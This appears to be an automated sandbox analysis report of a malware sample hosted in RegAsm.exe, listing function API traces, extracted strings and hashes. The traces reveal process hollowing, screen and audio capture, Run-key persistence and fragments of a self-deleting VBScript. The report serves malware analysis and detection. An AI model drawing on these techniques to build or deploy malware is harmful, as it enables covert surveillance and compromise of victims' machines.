                                                                Function 0043DEED Relevance: .2, Instructions: 214COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                • Instruction ID: 84bf5d8b6cf777f915eff3509e2c27b9c7ae744ab127a35c194aadb47efed811
                                                                • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                • Instruction Fuzzy Hash: E1517761E0660557DF38892A94D67BF23A59B4E308F18351FE483CB3C2C65EEE06835E
                                                                Function 00427C40 Relevance: .2, Instructions: 187COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5391bdb46e7b363b15ab8dfbfe7515acbec1a5683836347dd09947684361f79a
                                                                • Instruction ID: d4d389248adab082d17fbdeb677dfbf93ddf16fcbb8c162b69e64d6cf0e33668
                                                                • Opcode Fuzzy Hash: 5391bdb46e7b363b15ab8dfbfe7515acbec1a5683836347dd09947684361f79a
                                                                • Instruction Fuzzy Hash: 61615B72A083059BC308DF35E481A5FB7E4AFCC718F814E2EF595D6151EA74EA08CB86
                                                                Function 004387F0 Relevance: .1, Instructions: 76COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                • Instruction ID: 582e3a7babb983407823034c482dc4f24404013c153b7f4d28c3fef3b0c68a44
                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                • Instruction Fuzzy Hash: 43113B7720034183D60CAA6DC4B45BBD795EADE320FBD627FF0414B744CA2AD4459508
                                                                Function 00418EB1 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                                  • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                                • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                • DeleteDC.GDI32(00000000), ref: 00418F68
                                                                • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                                • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                                • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                                • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                                • GetIconInfo.USER32(?,?), ref: 00418FF8
                                                                • DeleteObject.GDI32(?), ref: 00419027
                                                                • DeleteObject.GDI32(?), ref: 00419034
                                                                • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                                • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                                • DeleteDC.GDI32(?), ref: 004191B7
                                                                • DeleteDC.GDI32(00000000), ref: 004191BA
                                                                • DeleteObject.GDI32(00000000), ref: 004191BD
                                                                • GlobalFree.KERNEL32(?), ref: 004191C8
                                                                • DeleteObject.GDI32(00000000), ref: 0041927C
                                                                • GlobalFree.KERNEL32(?), ref: 00419283
                                                                • DeleteDC.GDI32(?), ref: 00419293
                                                                • DeleteDC.GDI32(00000000), ref: 0041929E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                                • String ID: DISPLAY
                                                                • API String ID: 479521175-865373369
                                                                • Opcode ID: 7c8983c53be72e5ee4313047db9d93c3c673d7ce03baff72bd223da92b172140
                                                                • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                                • Opcode Fuzzy Hash: 7c8983c53be72e5ee4313047db9d93c3c673d7ce03baff72bd223da92b172140
                                                                • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                                Function 0041812A Relevance: 49.3, APIs: 22, Strings: 6, Instructions: 289libraryloaderthreadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                                                • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                                • ResumeThread.KERNEL32(?), ref: 00418470
                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                                • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                                • GetLastError.KERNEL32 ref: 004184B5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`Mw$ntdll
                                                                • API String ID: 4188446516-1701449367
                                                                • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                                • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                                                Function 0040D45B Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                  • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                                • ExitProcess.KERNEL32 ref: 0040D80B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                • API String ID: 1861856835-1447701601
                                                                • Opcode ID: d8e89e1965ce5ba2bf863528709aed873fcbb5ceb95d6d84e5684f15fc94d683
                                                                • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                                • Opcode Fuzzy Hash: d8e89e1965ce5ba2bf863528709aed873fcbb5ceb95d6d84e5684f15fc94d683
                                                                • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                                Function 0040D0D1 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,6CCF8300,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                                • ExitProcess.KERNEL32 ref: 0040D454
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                                • API String ID: 3797177996-2483056239
                                                                • Opcode ID: ec0aa7fa51458eb6c40e0caf451084b880c625aab6ab7814cb26008928a5b4c2
                                                                • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                                • Opcode Fuzzy Hash: ec0aa7fa51458eb6c40e0caf451084b880c625aab6ab7814cb26008928a5b4c2
                                                                • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                                Function 004124B0 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                                                • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                                • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                                • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                                • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                                • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                                  • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                                • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                                • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                                • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                                • API String ID: 2649220323-436679193
                                                                • Opcode ID: 4de65e87239deceda2419c6e22f4a35cea52a01b2b97f48f14606854e77c6627
                                                                • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                                • Opcode Fuzzy Hash: 4de65e87239deceda2419c6e22f4a35cea52a01b2b97f48f14606854e77c6627
                                                                • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                                Function 0041B0D8 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B21F
                                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                                • SetEvent.KERNEL32 ref: 0041B2AA
                                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                                • CloseHandle.KERNEL32 ref: 0041B2CB
                                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                • API String ID: 738084811-2094122233
                                                                • Opcode ID: e27b3f9eba018f8ca3c324594b7161069c0f951711efb11517c4a8cfdc535e62
                                                                • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                                • Opcode Fuzzy Hash: e27b3f9eba018f8ca3c324594b7161069c0f951711efb11517c4a8cfdc535e62
                                                                • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                                Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Write$Create
                                                                • String ID: RIFF$WAVE$data$fmt
                                                                • API String ID: 1602526932-4212202414
                                                                • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                                • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                                Function 004072AB Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc
                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                • API String ID: 1646373207-255920310
                                                                • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                                • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                                Function 0040CE34 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 0040CE42
                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                                • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
                                                                • _wcslen.LIBCMT ref: 0040CF21
                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                                • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000), ref: 0040CFBF
                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                                • _wcslen.LIBCMT ref: 0040D001
                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D068
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                                • ExitProcess.KERNEL32 ref: 0040D09D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                                                • API String ID: 1579085052-2309681474
                                                                • Opcode ID: 283c2ff4283ef6ea14c9631ac3abc3b8d6689ce6a044c306617b0cf23f9fad85
                                                                • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                                • Opcode Fuzzy Hash: 283c2ff4283ef6ea14c9631ac3abc3b8d6689ce6a044c306617b0cf23f9fad85
                                                                • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                                Function 0041C0AC Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                                • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                                • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                                • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                                • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                                • _wcslen.LIBCMT ref: 0041C1CC
                                                                • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                                • GetLastError.KERNEL32 ref: 0041C204
                                                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                                • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                                • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                                • GetLastError.KERNEL32 ref: 0041C261
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                • String ID: ?
                                                                • API String ID: 3941738427-1684325040
                                                                • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                                • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                                Function 0044F4AD Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
